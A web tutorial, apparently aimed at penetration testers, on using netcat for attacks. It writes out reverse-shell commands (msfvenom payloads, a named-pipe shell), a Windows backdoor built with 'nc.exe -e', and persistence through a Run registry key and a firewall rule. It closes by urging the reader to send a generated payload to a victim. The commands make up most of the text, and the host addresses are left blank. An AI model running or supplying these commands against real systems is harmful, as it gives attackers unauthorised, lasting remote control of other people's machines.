NetCat for pentester

Introduction to NetCat

Netcat, also used as “nc” is a network utility that uses TCP and UDP connections to read and write on the network. It can be used by both attackers and security auditors. Considering the attack scenario, this cross-functional tool can be script-driven, which makes it quite reliable and will also help us debug and explore the network.

Netcat can do everything, be it port scanning, banner grabbing, file transfer, or even making a reverse connection.

Let’s take a look at the main features of netcat:

  1. It acts as a simple TCP/UDP/SCTP/SSL client to communicate with web servers, telnet servers, mail servers, and other TCP/IP network services.

  2. It redirects TCP/UDP/SCTP traffic to other ports or hosts, acting as a SOCKS or HTTP proxy.

  3. Netcat can even connect to destinations through a chain of anonymous or authenticated proxies

  4. Encrypts communication using SSL and transmits it over IPv4 or IPv6.

  5. It acts as a connection broker, allowing two (or more) clients to connect through a third (proxy) server. So, until now, you may have known about all the features of Netcat that make it unique and simple. Let’s try to dig deeper and find out what else we can do with this amazing tool.

Linux Reverse Shell

As discussed earlier, netcat can do anything, so now we will try to use the target machine with msfvenom to create a payload and set up a netcat listener to capture the session.

Let’s try to create a payload using the following command:

msfvenom -p cmd/unix/reverse_netcat lhost= lport=1234 R

The “R” parameter is used to generate the raw payload that will be displayed on our screen.

In the image above, you can see that our payload is ready, now it’s time to run it on our victim’s server.

Open an Ubuntu machine and enter this payload into a terminal. Before running it, go back to the Kali Linux machine and set up a netcat listener using the same port number you used when creating the payload.

But in a high security case, we won’t be able to capture the session using this method, but there is another way to get a reverse shell. Before doing this, configure the netcat listener on port 443.

And after starting nc, just run the following commands on the target machine:

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 443 1>/tmp/backpipe

This will help you bypass the security and connect to the netcat session.

Grabbing the HTTP Banner

HTTP headers can no longer be easily retrieved as they contain information about the server. But we can use netcat to collect information about any web server.

Just run the following command to manipulate the target server and check what we have captured.

printf "GET / HTTP/1.0\r\n\r\n" | nc 80

In the image, you can see that the HTTP banner has been received and we are presented with the nginx server.

Windows Reverse Connection

Now let’s generate a backdoor on a Windows machine that will allow us to log in at any time. Let’s first set up a listener on our kali machine:
nc –lvp 1234
Then, at the victim’s Windows command prompt, run the following command to create the backdoor.
nc.exe 1234 -e Backd.exe
After running Backd.exe, we will get a reverse shell, and we will also receive a back connection even after the connection between the machines is broken, provided that the ip address of the attacked machine remains the same, and Backd.exe will be launched.

Windows 10 Persistence

So let’s try to create a permanent backdoor using netcat and the Metasploit framework on the host that we have compromised. In the image below, you can see that I have captured the Meterpreter session on the Windows 10 machine. Now download the netcat.exe file to system32 on the victim machine with the following command:
upload /usr/share/windows-binaries/nc.exe C:\windows\system32

Now configure netcat to listen on any random port, say 4445, open the port on startup and establish a connection. Use the following command:
reg setval -k HKLM\software\microsoft\windows\currentversion\run - v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'

Upon successful connection to netcat, we will get the reverse shell of the victim’s machine.
Now it’s time to add a new rule to the firewall named “netcat” where the incoming connection will allow port 4445 with an interactive cmd running the netsh command.

Enter the following command:
netsh advfirewall firewall add rule name="netcat" dir=in action=allow protocol=Tcp localport=4445
Now check the operating mode and port status with the following command:
netsh firewall show portopening

Now when the victim reboots the system again, we will get the netcat shell. Run the following command to connect our netcat backdoor on port 4445:
nc -nv 4445
We have successfully set up a permanent backdoor, now whenever the victim boots we will always have his session.

Msfvenom Payload with Netcat

So let’s find out how we can connect to the victim through our Netcat shell using the msfvenom payload. Launch a terminal and run the following command to generate the .exe payload.
msfvenom -p windows/shell_reverse_tcp lhost= lport=3333 –f exe > shell.exe

Now enable Netcat on port 3333:
nc -lvp 3333
Share this generated payload with the victim and as soon as he opens it, you will get a reverse connection.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *